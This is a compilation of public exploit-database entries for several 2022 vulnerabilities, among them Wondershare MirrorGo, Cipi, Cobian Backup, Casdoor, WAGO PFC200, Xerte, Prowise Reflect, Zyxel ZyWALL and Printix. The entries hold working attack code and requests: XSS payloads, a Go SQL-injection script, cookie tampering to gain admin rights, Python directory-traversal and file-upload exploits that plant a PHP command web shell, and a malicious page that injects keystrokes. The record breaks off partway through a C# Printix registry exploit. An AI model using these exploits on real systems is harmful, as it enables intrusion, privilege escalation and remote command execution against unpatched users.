# Exploit Title: Wondershare MirrorGo 2.0.11.346 - Insecure File Permissions # Discovery by: Luis Martinez # Discovery Date: 2022-02-23 # Vendor Homepage: https://www.wondershare.com/ # Software Link : https://download.wondershare.com/mirror_go_full8050.exe # Tested Version: 2.0.11.346 # Vulnerability Type: Local Privilege Escalation # Tested on OS: Windows 10 Pro x64 es # Step to discover Privilege Escalation: # Insecure folders permissions issue: C:\>icacls "C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\*" | findstr /i "everyone" | findstr /i ".exe" C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\adb.exe Everyone:(I)(F) C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\BsSndRpt.exe Everyone:(I)(F) C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\DriverInstall32.exe Everyone:(I)(F) C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\DriverInstall64.exe Everyone:(I)(F) C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ElevationService.exe Everyone:(I)(F) C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\MirrorGo.exe Everyone:(I)(F) C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ProcessKiller.exe Everyone:(I)(F) C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ProcessKiller.exe.config Everyone:(I)(F) C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\unins000.exe Everyone:(I)(F) # Service info: C:\>sc qc ElevationService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: ElevationService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ElevationService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Wondershare Driver Install Service help DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A vulnerability was found in Wondershare MirrorGo 2.0.11.346. 
The Wondershare MirrorGo executable "ElevationService.exe" is writable by Everyone (icacls reports Everyone:(I)(F), i.e. Full Control inherited from the install folder), so any local, unprivileged user can overwrite it with a malicious binary. Because the ElevationService service is configured with START_TYPE AUTO_START and SERVICE_START_NAME LocalSystem, the replaced file is executed as LocalSystem the next time the service starts (at boot or on a service restart); while the service is running its image is locked, so the swap may have to wait for a stop or reboot. The other executables in the same folder (adb.exe, MirrorGo.exe, DriverInstall32/64.exe, unins000.exe, ...) carry the same permissions and can likewise be backdoored, running in the context of whichever user launches them.
-
Cipi Control Panel 3.1.15 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Exploit Title: Cipi Control Panel 3.1.15 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Date: 24.02.2022
# Exploit Author: Fikrat Ghuliev (Ghuliev)
# Vendor Homepage: https://cipi.sh/ <https://www.aapanel.com/>
# Software Link: https://cipi.sh/ <https://www.aapanel.com/>
# Version: 3.1.15
# Tested on: Ubuntu

When a user adds a new server from the "Server" panel, the "name" parameter of the POST /api/servers request is stored without any sanitisation or output encoding, so HTML/JavaScript placed in it is persisted and rendered back by the panel (stored XSS). The request carries a Bearer token, so an attacker needs a valid Cipi account; the payload then executes for any user who views the affected server entry.

POST /api/servers HTTP/1.1
Host: IP
Content-Length: 102
Accept: application/json
X-Requested-With: XMLHttpRequest
Authorization: Bearer
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Content-Type: application/json
Origin: http://IP
Referer: http://IP/servers
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

{ "name":"\"><script>alert(1337)</script>", "ip":"10.10.10.10", "provider":"local", "location":"xss test" }
-
Cobian Reflector 0.9.93 RC1 - 'Password' Denial of Service (PoC)
# Exploit Title: Cobian Reflector 0.9.93 RC1 - 'Password' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2022-02-16
# Vendor Homepage: https://www.cobiansoft.com/
# Software Link: https://files.cobiansoft.com/programs/crSetup-0.9.93-RC1.exe
# Tested Version: 0.9.93 RC1
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to Produce the Crash:
# 1.- Run python code: Cobian_Reflector_0.9.93_RC1.py
# 2.- Open Cobian_Reflector_0.9.93_RC1.txt and copy content to clipboard
# 3.- Open "Cobian Reflector User Interface"
# 4.- Task -> "New task"
# 5.- Files -> Source "Add" -> SFTP
# 6.- Host -> 10.10.10.10
# 7.- Port-> 22
# 8.- User name -> admin
# 9.- Paste ClipBoard on "Password"
# 10.- Test settings
# 11.- Yes
# 12.- Crashed

#!/usr/bin/env python

# The oversized "password": 8000 bytes of 'A' (0x41). Pasting this into the
# SFTP password field and running "Test settings" is what triggers the crash
# described in the steps above.
buffer = "\x41" * 8000

# Drop the payload into a text file next to this script so it can be copied
# to the clipboard (step 2). The context manager closes the file for us.
with open("Cobian_Reflector_0.9.93_RC1.txt", "w") as payload_file:
    payload_file.write(buffer)
-
Cobian Backup 11 Gravity 11.2.0.582 - 'Password' Denial of Service (PoC)
# Exploit Title: Cobian Backup 11 Gravity 11.2.0.582 - 'Password' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2022-02-16
# Vendor Homepage: https://www.cobiansoft.com/
# Software Link: https://files.cobiansoft.com/programs/cbSetup.exe
# Tested Version: 11.2.0.582
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to Produce the Crash:
# 1.- Run python code: Cobian_Backup_11.2.0.582.py
# 2.- Open Cobian_Backup_11.2.0.582.txt and copy content to clipboard
# 3.- Open "Cobian Backup 11 Gravity User Interface"
# 4.- Task -> "New task"
# 5.- File -> Source "Add" -> FTP
# 6.- Host -> 10.10.10.10
# 7.- Port-> 21
# 8.- User name -> admin
# 9.- Paste ClipBoard on "Password"
# 10.- Ok
# 11.- Crashed

#!/usr/bin/env python

# The oversized "password": 800 bytes of 'A' (0x41). Pasting this into the
# FTP password field and confirming with "Ok" is what triggers the crash
# described in the steps above.
buffer = "\x41" * 800

# Write the payload to a text file next to this script so it can be copied
# to the clipboard (step 2). The context manager closes the file for us.
with open("Cobian_Backup_11.2.0.582.txt", "w") as payload_file:
    payload_file.write(buffer)
-
Cobian Backup Gravity 11.2.0.582 - 'CobianBackup11' Unquoted Service Path
# Exploit Title: Cobian Backup Gravity 11.2.0.582 - 'CobianBackup11' Unquoted Service Path
# Discovery by: Luis Martinez
# Discovery Date: 2022-02-24
# Vendor Homepage: https://www.cobiansoft.com/
# Software Link : https://files.cobiansoft.com/programs/cbSetup.exe
# Tested Version: 11.2.0.582
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es

# Step to discover Unquoted Service Path:

C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Gravity " | findstr /i /v """

Cobian Backup 11 Gravity CobianBackup11 C:\Program Files (x86)\Cobian Backup 11\cbService.exe Auto

# Service info:

C:\>sc qc CobianBackup11
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: CobianBackup11
 TYPE : 10 WIN32_OWN_PROCESS
 START_TYPE : 2 AUTO_START
 ERROR_CONTROL : 1 NORMAL
 BINARY_PATH_NAME : C:\Program Files (x86)\Cobian Backup 11\cbService.exe
 LOAD_ORDER_GROUP :
 TAG : 0
 DISPLAY_NAME : Cobian Backup 11 Gravity
 DEPENDENCIES :
 SERVICE_START_NAME : LocalSystem

#Exploit:
Because BINARY_PATH_NAME is unquoted and contains spaces, the Service Control Manager resolves it by trying C:\Program.exe, then C:\Program Files (x86)\Cobian.exe, then C:\Program Files (x86)\Cobian Backup.exe before reaching the real cbService.exe. A local user who can create a file at one of those locations gets it executed as LocalSystem the next time the service starts (START_TYPE is AUTO_START, so at every boot). On a default Windows 10 installation standard users cannot create files directly under C:\ or inside C:\Program Files (x86), so this is a privilege-escalation primitive that only becomes exploitable where those directory permissions have been weakened; it is not directly exploitable on its own.
-
Casdoor 1.13.0 - SQL Injection (Unauthenticated)
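// Exploit Title: Casdoor 1.13.0 - SQL Injection (Unauthenticated)
// Date: 2022-02-25
// Exploit Author: Mayank Deshmukh
// Vendor Homepage: https://casdoor.org/
// Software Link: https://github.com/casdoor/casdoor/releases/tag/v1.13.0
// Version: version < 1.13.1
// Security Advisory: https://github.com/advisories/GHSA-m358-g4rp-533r
// Tested on: Kali Linux
// CVE : CVE-2022-24124
// Github POC: https://github.com/ColdFusionX/CVE-2022-24124
// Exploit Usage : go run exploit.go -u http://127.0.0.1:8080

package main

import (
	"flag"
	"fmt"
	"html"
	"io/ioutil"
	"net/http"
	"os"
	"regexp"
	"strings"
	"time"
)

// injectionPath is the organisations listing endpoint (reachable without
// authentication) with an updatexml() payload in the `field` parameter.
// When the parameter reaches MySQL unsanitised, updatexml() raises an
// "XPATH syntax error" whose message contains the output of version(), and
// the server echoes that error text back in the HTTP response.
const injectionPath = "/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(null,version(),null)"

// leakPattern matches the MySQL XPATH error text up to the closing quote of
// the leaked value. Case-insensitive because the exact casing of the message
// as relayed by the application is not guaranteed.
var leakPattern = regexp.MustCompile(`(?i)(XPATH syntax error.*')`)

// extractLeak pulls the leaked version string out of a response body.
//
// It returns the cleaned error text (square brackets, single quotes and
// semicolons stripped, HTML entities decoded) and true when the XPATH marker
// is present, or ("", false) when the body carries no such error, which is
// what a patched (>= 1.13.1) instance produces.
func extractLeak(body string) (string, bool) {
	matches := leakPattern.FindAllString(body, -1)
	if matches == nil {
		return "", false
	}
	// fmt.Sprint renders the slice as "[m1 m2 ...]"; the replacer then drops
	// the brackets together with the quotes around the leaked value.
	cleaner := strings.NewReplacer("[", "", "]", "", "'", "", ";", "")
	return html.UnescapeString(cleaner.Replace(fmt.Sprint(matches))), true
}

// main sends one GET with the injection payload to the target given by -u and
// prints the database version leaked through the error message, exiting 1
// when no leak is observed.
func main() {
	var url string
	flag.StringVar(&url, "u", "", "Casdoor URL (ex. http://127.0.0.1:8080)")
	flag.Parse()

	banner := `
 -=Casdoor SQL Injection (CVE-2022-24124)=-
 - by Mayank Deshmukh (ColdFusionX)
`
	// Print, not Printf: the banner is data, not a format string.
	fmt.Print(banner)

	// Without -u the original built a relative URL, got a transport error
	// and panicked; fail with usage instead.
	if url == "" {
		fmt.Fprintln(os.Stderr, "[!] missing target, use -u http://host:port")
		flag.Usage()
		os.Exit(2)
	}
	// Tolerate a trailing slash on the target without producing "//api".
	url = strings.TrimRight(url, "/")

	fmt.Println("[*] Dumping Database Version")

	// Bounded client so an unresponsive host cannot hang the PoC forever.
	client := &http.Client{Timeout: 15 * time.Second}
	response, err := client.Get(url + injectionPath)
	if err != nil {
		fmt.Fprintf(os.Stderr, "[!] request failed: %v\n", err)
		os.Exit(1)
	}
	databytes, err := ioutil.ReadAll(response.Body)
	// Close explicitly: os.Exit below would skip a deferred Close.
	response.Body.Close()
	if err != nil {
		fmt.Fprintf(os.Stderr, "[!] reading response failed: %v\n", err)
		os.Exit(1)
	}

	leak, found := extractLeak(string(databytes))
	if !found {
		fmt.Printf("Application not vulnerable\n")
		os.Exit(1)
	}
	fmt.Println(leak)
}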
-
WAGO 750-8212 PFC200 G2 2ETH RS - Privilege Escalation
# Exploit Title: WAGO 750-8212 PFC200 G2 2ETH RS Privilege Escalation
# Date: 02/16/2022
# Exploit Author: Momen Eldawakhly (Cyber Guy) at Cypro AB
# Vendor Homepage: https://www.wago.com
# Version: Firmware version 03.05.10(17)
# Tested on: PopOS! [Linux](Firefox)

========================================
= The ordinary user privilege request:
========================================

GET /wbm/ HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://192.168.1.1/wbm/
Cookie: NG_WBM_SESSION=qru3ocrpde79m5f73526i65uv5; user={%22name%22:%22user%22%2C%22roles%22:[%22user%22%2C%22guest%22]%2C%22hasDefaultPassword%22:true%2C%22csrf%22:%22U2fJfixrfWtLEbVFL6b71oou1yk1WqKTsdFo52yavqrTF86f%22%2C%22timestamp%22:1642368720673%2C%22sessionExists%22:true}

==========================================
= Manipulated Cookie to Admin Privilege:
==========================================

Only the client-side "user" cookie is edited: its JSON "name" and "roles" fields are changed from user/guest to admin, while the NG_WBM_SESSION identifier and the csrf value are reused unchanged. The web-based management therefore derives the caller's role from an unsigned, client-controlled cookie instead of from the server-side session, so a logged-in low-privilege user can grant themselves admin rights in the WBM.

GET /wbm/ HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://192.168.1.1/wbm/
Cookie: NG_WBM_SESSION=qru3ocrpde79m5f73526i65uv5; user={%22name%22:%22admin%22%2C%22roles%22:[%22admin%22%2C%22admin%22]%2C%22hasDefaultPassword%22:true%2C%22csrf%22:%22U2fJfixrfWtLEbVFL6b71oou1yk1WqKTsdFo52yavqrTF86f%22%2C%22timestamp%22:1642369499829%2C%22sessionExists%22:true}
-
Xerte 3.10.3 - Directory Traversal (Authenticated)
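# Exploit Title: Xerte 3.10.3 - Directory Traversal (Authenticated)
# Date: 05/03/2021
# Exploit Author: Rik Lutz
# Vendor Homepage: https://xerte.org.uk
# Software Link: https://github.com/thexerteproject/xerteonlinetoolkits/archive/refs/heads/3.9.zip
# Version: up until 3.10.3
# Tested on: Windows 10 XAMP
# CVE : CVE-2021-44665

# This PoC assumes guest login is enabled. Vulnerable url:
# https://<host>/getfile.php?file=<user-directory>/../../database.php
# You can find a userfiles-directory by creating a project and browsing the media menu.
# Create new project from template -> visit "Properties" (! symbol) -> Media and Quota -> Click file to download
# The userfiles-directory will be noted in the URL and/or when you download a file.
# They look like: <numbers>-<username>-<templatename>

import re
import sys

xerte_base_url = "http://127.0.0.1"
file_to_grab = "/../../database.php"
php_session_id = ""  # If guest is not enabled, and you have a session ID. Put it here.

# Numeric project id returned by new_template.php.
TEMPLATE_ID_RE = r'(\d+)'
# USER-FILES/<numbers>-<username>-<templatename> as referenced by the
# Media and Quota page of the freshly created project.
USER_DIR_RE = r'USER-FILES\/([0-9]+-[a-z0-9]+-[a-zA-Z0-9_]+)'


def first_match(pattern, text, what):
    """Return the first capture of `pattern` in `text`.

    The original indexed re.findall(...)[0] directly, which turns a disabled
    guest login, an invalid session or a changed page layout into a bare
    IndexError. Exit with a message naming `what` could not be found instead.
    """
    matches = re.findall(pattern, text)
    if not matches:
        sys.exit("[!] Could not find " + what + " in the server response; "
                 "is guest login enabled (or php_session_id valid)?")
    return matches[0]


def main():
    # Local import keeps first_match usable without the requests dependency.
    import requests

    with requests.Session() as session:
        # Get a PHP session ID (the guest login) or reuse the one supplied.
        if not php_session_id:
            session.get(xerte_base_url)
        else:
            session.cookies.set("PHPSESSID", php_session_id)

        # Create a new project from a default template; this is what makes
        # the server create a user directory under USER-FILES for us.
        new_template = {
            'tutorialid': 'Nottingham',
            'templatename': 'Nottingham',
            'tutorialname': 'exploit',
            'folder_id': ''
        }
        created = session.post(xerte_base_url + '/website_code/php/templates/new_template.php', data=new_template)
        template_id = first_match(TEMPLATE_ID_RE, created.text, "the template id")

        # The Media and Quota page of the project reveals the directory name.
        properties = session.post(xerte_base_url + '/website_code/php/properties/media_and_quota_template.php',
                                  data={'template_id': template_id})
        user_directory = first_match(USER_DIR_RE, properties.text, "the USER-FILES directory")

        # getfile.php only checks that the path starts with a user directory,
        # so "../.." walks out of it to the installation root.
        traversal_url = xerte_base_url + '/getfile.php?file=' + user_directory + file_to_grab
        result = session.get(traversal_url)
        print(result.text)

        session_id = session.cookies.get_dict()['PHPSESSID']
        print("|-- Used Variables: --|")
        print("PHP Session ID: " + session_id)
        print("user directory: " + user_directory)
        print("Curl example:")
        print('curl --cookie "PHPSESSID=' + session_id + '" ' + traversal_url)


if __name__ == "__main__":
    main()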
-
Xerte 3.9 - Remote Code Execution (RCE) (Authenticated)
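# Exploit Title: Xerte 3.9 - Remote Code Execution (RCE) (Authenticated)
# Date: 05/03/2021
# Exploit Author: Rik Lutz
# Vendor Homepage: https://xerte.org.uk
# Software Link: https://github.com/thexerteproject/xerteonlinetoolkits/archive/refs/heads/3.8.5-33.zip
# Version: up until version 3.9
# Tested on: Windows 10 XAMP
# CVE : CVE-2021-44664

# This PoC assumes guest login is enabled and the en-GB language files are used.
# This PoC will overwrite the existing language file (.inc) for the English index page with a shell.
# Vulnerable url: https://<host>/website_code/php/import/fileupload.php
# The mediapath variable can be used to set the destination of the upload.
# Create new project from template -> visit "Properties" (! symbol) -> Media and Quota

import re
import sys

xerte_base_url = "http://127.0.0.1"
php_session_id = ""  # If guest is not enabled, and you have a session ID. Put it here.

# Numeric project id returned by new_template.php.
TEMPLATE_ID_RE = r'(\d+)'
# Absolute install path leaked by the hidden "mediapath" input on the
# Media and Quota page.
MEDIAPATH_RE = r'mediapath" value="(.+?)"'

# Replacement for languages/en-GB/index.inc: a command shell in front of the
# original definitions, so the index page keeps working after the overwrite.
PHP_SHELL = r'''<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
/**
 *
 * index.php english language file
 *
 * @author Patrick Lockley
 * @version 1.0
 * @copyright Pat Lockley
 * @package
 */
define("INDEX_USERNAME_AND_PASSWORD_EMPTY", "Please enter your username and password");
define("INDEX_USERNAME_EMPTY", "Please enter your username");
define("INDEX_PASSWORD_EMPTY", "Please enter your password");
define("INDEX_LDAP_MISSING", "PHP's LDAP library needs to be installed to use LDAP authentication. If you read the install guide other options are available");
define("INDEX_SITE_ADMIN", "Site admins should log on on the manangement page");
define("INDEX_LOGON_FAIL", "Sorry that password combination was not correct");
define("INDEX_LOGIN", "login area");
define("INDEX_USERNAME", "Username");
define("INDEX_PASSWORD", "Password");
define("INDEX_HELP_TITLE", "Getting Started");
define("INDEX_HELP_INTRODUCTION", "We've produced a short introduction to the Toolkits website.");
define("INDEX_HELP_INTRO_LINK_TEXT","Show me!");
define("INDEX_NO_LDAP","PHP's LDAP library needs to be installed to use LDAP authentication. If you read the install guide other options are available");
define("INDEX_FOLDER_PROMPT","What would you like to call your folder?");
define("INDEX_WORKSPACE_TITLE","My Projects");
define("INDEX_CREATE","Project Templates");
define("INDEX_DETAILS","Project Details");
define("INDEX_SORT","Sort");
define("INDEX_SEARCH","Search");
define("INDEX_SORT_A","Alphabetical A-Z");
define("INDEX_SORT_Z","Alphabetical Z-A");
define("INDEX_SORT_NEW","Age (New to Old)");
define("INDEX_SORT_OLD","Age (Old to New)");
define("INDEX_LOG_OUT","Log out");
define("INDEX_LOGGED_IN_AS","Logged in as");
define("INDEX_BUTTON_LOGIN","Login");
define("INDEX_BUTTON_LOGOUT","Logout");
define("INDEX_BUTTON_PROPERTIES","Properties");
define("INDEX_BUTTON_EDIT","Edit");
define("INDEX_BUTTON_PREVIEW", "Preview");
define("INDEX_BUTTON_SORT", "Sort");
define("INDEX_BUTTON_NEWFOLDER", "New Folder");
define("INDEX_BUTTON_NEWFOLDER_CREATE", "Create");
define("INDEX_BUTTON_DELETE", "Delete");
define("INDEX_BUTTON_DUPLICATE", "Duplicate");
define("INDEX_BUTTON_PUBLISH", "Publish");
define("INDEX_BUTTON_CANCEL", "Cancel");
define("INDEX_BUTTON_SAVE", "Save");
define("INDEX_XAPI_DASHBOARD_FROM", "From:");
define("INDEX_XAPI_DASHBOARD_UNTIL", "Until:");
define("INDEX_XAPI_DASHBOARD_GROUP_SELECT", "Select group:");
define("INDEX_XAPI_DASHBOARD_GROUP_ALL", "All groups");
define("INDEX_XAPI_DASHBOARD_SHOW_NAMES", "Show names and/or email addresses");
define("INDEX_XAPI_DASHBOARD_CLOSE", "Close dashboard");
define("INDEX_XAPI_DASHBOARD_DISPLAY_OPTIONS", "Display options");
define("INDEX_XAPI_DASHBOARD_SHOW_HIDE_COLUMNS", "Show / hide columns");
define("INDEX_XAPI_DASHBOARD_QUESTION_OVERVIEW", "Interaction overview");
define("INDEX_XAPI_DASHBOARD_PRINT", "Print");
'''


def first_match(pattern, text, what):
    """Return the first capture of `pattern` in `text`.

    The original indexed re.findall(...)[0] directly, which turns a disabled
    guest login, an invalid session or a changed page layout into a bare
    IndexError. Exit with a message naming `what` could not be found instead.
    """
    matches = re.findall(pattern, text)
    if not matches:
        sys.exit("[!] Could not find " + what + " in the server response; "
                 "is guest login enabled (or php_session_id valid)?")
    return matches[0]


def main():
    # Local import keeps first_match / PHP_SHELL usable without requests.
    import requests

    with requests.Session() as session:
        # Get a PHP session ID (the guest login) or reuse the one supplied.
        if not php_session_id:
            session.get(xerte_base_url)
        else:
            session.cookies.set("PHPSESSID", php_session_id)

        # Create a new project from a default template so that its
        # Media and Quota page (and the install path it leaks) exists.
        new_template = {
            'tutorialid': 'Nottingham',
            'templatename': 'Nottingham',
            'tutorialname': 'exploit',
            'folder_id': ''
        }
        created = session.post(xerte_base_url + '/website_code/php/templates/new_template.php', data=new_template)
        template_id = first_match(TEMPLATE_ID_RE, created.text, "the template id")

        properties = session.post(xerte_base_url + '/website_code/php/properties/media_and_quota_template.php',
                                  data={'template_id': template_id})
        install_path = first_match(MEDIAPATH_RE, properties.text, "the mediapath install path")

        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
            'Accept-Language': 'nl,en-US;q=0.7,en;q=0.3',
        }
        # The original hand-built the multipart body around a fixed boundary
        # (with stray "\r " framing); letting requests encode it keeps the
        # Content-Type boundary and the body consistent. fileupload.php takes
        # the client-supplied mediapath as the destination directory, so
        # three "../" from the media folder land in languages/en-GB/.
        files = {'filenameuploaded': ('index.inc', PHP_SHELL, 'application/octet-stream')}
        form = {'mediapath': install_path + '../../../languages/en-GB/'}

        # Overwrite index.inc with the shell.
        response = session.post(xerte_base_url + '/website_code/php/import/fileupload.php',
                                headers=headers, files=files, data=form)
        print('Installation path: ' + install_path)
        print(response.text)
        if "success" in response.text:
            print("Visit shell @: " + xerte_base_url + '/?cmd=whoami')


if __name__ == "__main__":
    main()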
-
Prowise Reflect v1.0.9 - Remote Keystroke Injection
# Exploit Title: Prowise Reflect v1.0.9 - Remote Keystroke Injection
# Date: 30/10/2022
# Exploit Author: Rik Lutz
# Vendor Homepage: https://www.prowise.com/
# Version: V1.0.9
# Tested on: Windows 10

# Prowise Reflect software version 1.0.9 for Windows is vulnerable to a remote keystroke injection.
# Much like how a rubber ducky attack works but this works either over the network (when port 8082 is exposed),
# or by visiting a malicious website. This POC contains the malicious webpage.

# Steps:
# 1. Start Prowise reflect
# 2. Try to connect to a reflect server e.q. ygm7u6od
# 3. When it is connecting click exploit
# - Start menu will open, types notepad.exe and types hello world.

<!DOCTYPE HTML>
<html>
<head>
<script type = "text/javascript">
// Synchronous pause of `ms` milliseconds (busy loop). Used to space the
// injected keystrokes so the target has time to act on each one.
function wait(ms) {
    var deadline = new Date().getTime() + ms;
    while (new Date().getTime() < deadline) {
        // spin until the deadline passes
    }
}

// Connects to the Reflect client's local WebSocket endpoint (port 8082) and
// replays a keystroke sequence: Win key, "notepad.exe", Enter, then
// "Hello world!". Per the description above, a page in the victim's browser
// can do this, i.e. the client does not restrict which origin may connect.
function WebSocketTest() {
    if (!("WebSocket" in window)) {
        // The browser doesn't support WebSocket
        alert("WebSocket NOT supported by your Browser!");
        return;
    }

    var socket = new WebSocket("ws://localhost:8082");

    // Sends one "keyboard" event per character of `text`.
    // (A single event carrying a "character" field also exists, but the
    // original author notes it is slower than per-key events.)
    function typeKeys(text) {
        for (var i = 0; i < text.length; i++) {
            socket.send('{"event":"keyboard", "key":"' + text.charAt(i) + '"}');
        }
    }

    socket.onopen = function () {
        // Hint from the original author: the "connecting" state can be probed
        // by sending {"event":"setupRTCConnection", "remoteName":"a"}; a
        // {"event":"streamAvailable"} reply means getIsConnecting == true.
        socket.send('{"event":"keyboard", "key":"super"}');
        wait(400);
        typeKeys("notepad.exe");
        wait(300);
        socket.send('{"event":"keyboard", "key":"enter"}');
        wait(2000);
        typeKeys("Hello world!");
        wait(200);
    };

    socket.onmessage = function (evt) {
        // Replies are not needed for the injection; ignore them.
    };

    socket.onclose = function () {
        // websocket is closed.
        alert("Connection is closed...");
    };
}
</script>
</head>
<body>
<div id = "sse">
<a href = "javascript:WebSocketTest()">Exploit!</a>
</div>
</body>
</html>
-
Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting (XSS)
# Exploit Title: Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting (XSS) # Date: 1/3/2022 # Exploit Author: Momen Eldawakhly (CyberGuy) # Vendor Homepage: https://www.zyxel.com # Version: ZyWALL 2 Plus # Tested on: Ubuntu Linux [Firefox] # CVE : CVE-2021-46387 GET /Forms/rpAuth_1?id=%3C/form%3E%3CiMg%20src=x%20onerror=%22prompt(1)%22%3E%3Cform%3E HTTP/1.1 Host: vuln.ip:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1
-
Printix Client 1.3.1106.0 - Remote Code Execution (RCE)
# Exploit Title: Printix Client 1.3.1106.0 - Remote Code Execution (RCE)
# Date: 3/1/2022
# Exploit Author: Logan Latvala
# Vendor Homepage: https://printix.net
# Software Link: https://software.printix.net/client/win/1.3.1106.0/PrintixClientWindows.zip
# Version: <= 1.3.1106.0
# Tested on: Windows 7, Windows 8, Windows 10, Windows 11
# CVE : CVE-2022-25089
# Github for project: https://github.com/ComparedArray/printix-CVE-2022-25089

using Microsoft.Win32;
using Newtonsoft.Json;
using Newtonsoft.Json.Converters;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Text;
using System.Threading;
using System.Threading.Tasks;

/**
 * ________________________________________
 *
 * Printix Vulnerability, CVE-2022-25089
 * Part of a Printix Vulnerability series
 * Author: Logan Latvala
 * Github: https://github.com/ComparedArray/printix-CVE-2022-25089
 * ________________________________________
 *
 */

// Interactive PoC client for the Printix client service listening on TCP 21338.
// CompCommClient and DefaultValues are not defined in this file; they come from
// the Printix client assembly the project references.
namespace ConsoleApp1a
{
    /// <summary>
    /// Payload of the registry command (command number 49). Serialised with
    /// JsonConvert and sent as the message body to the service.
    /// </summary>
    public class PersistentRegistryData
    {
        /// <summary>Operation requested; this PoC only ever sends RestoreData.</summary>
        public PersistentRegistryCmds cmd;
        /// <summary>
        /// Target key/value path. The interactive prompt replaces the leading
        /// "HKEY_LOCAL_MACHINE" with "printix", so only HKLM paths can be addressed.
        /// </summary>
        public string path;
        /// <summary>Hard-coded to 12 by the prompt; its meaning on the service side is not visible here.</summary>
        public int VDIType;
        /// <summary>
        /// One tag byte (1 = String, 4 = DWord, 11 = QWord, 7 = MultiString)
        /// followed by the value as encoded by Session.selectDataType.
        /// </summary>
        public byte[] registryData;
    }

    /// <summary>Registry operations understood by the service; serialised by name.</summary>
    [JsonConverter(typeof(StringEnumConverter))]
    public enum PersistentRegistryCmds
    {
        StoreData = 1,
        DeleteSubTree,
        RestoreData
    }

    /// <summary>
    /// Collects, from the console, the host and message body for one command.
    /// Only command numbers 0, 2, 49 and 100 are handled; any other value leaves
    /// host, data and sessionName null.
    /// </summary>
    public class Session
    {
        public int commandNumber { get; set; }
        public string host { get; set; }
        public string data { get; set; }
        public string sessionName { get; set; }

        /// <param name="commandSessionNumber">
        /// Service command number: 0 exits the process, 2 prepares a ping,
        /// 49 prepares a registry edit, 100 prompts for a raw message.
        /// </param>
        public Session(int commandSessionNumber = 0)
        {
            commandNumber = commandSessionNumber;
            switch (commandSessionNumber)
            {
                //Incase it's initiated, kill it immediately.
                case (0):
                    Environment.Exit(0x001);
                    break;
                //Incase the Ping request is sent though, get its needed data.
                case (2):
                    Console.WriteLine("\n What Host Address? (DNS Names Or IP)\n");
                    Console.Write("IP: ");
                    host = Console.ReadLine();
                    Console.WriteLine("Host address set to: " + host);
                    data = "pingData";
                    sessionName = "PingerRinger";
                    break;
                //Incase the RegEdit request is sent though, get its needed data.
                // Builds a PersistentRegistryData (RestoreData) from console input and
                // stores its JSON in `data`. No credentials are collected at any point;
                // per the author's notes in Main the service accepts this without auth.
                case (49):
                    Console.WriteLine("\n What Host Address? (DNS Names Or IP)\n");
                    Console.Write("IP: ");
                    host = Console.ReadLine();
                    Console.WriteLine("Host address set to: " + host);
                    PersistentRegistryData persistentRegistryData = new PersistentRegistryData();
                    persistentRegistryData.cmd = PersistentRegistryCmds.RestoreData;
                    persistentRegistryData.VDIType = 12; //(int)DefaultValues.VDIType;
                    //persistentRegistryData.path = "printix\\SOFTWARE\\Intel\\HeciServer\\das\\SocketServiceName";
                    Console.WriteLine("\n What Node starting from \\\\Local-Machine\\ would you like to select? \n");
                    Console.WriteLine("Example: HKEY_LOCAL_MACHINE\\SOFTWARE\\Intel\\HeciServer\\das\\SocketServiceName\n");
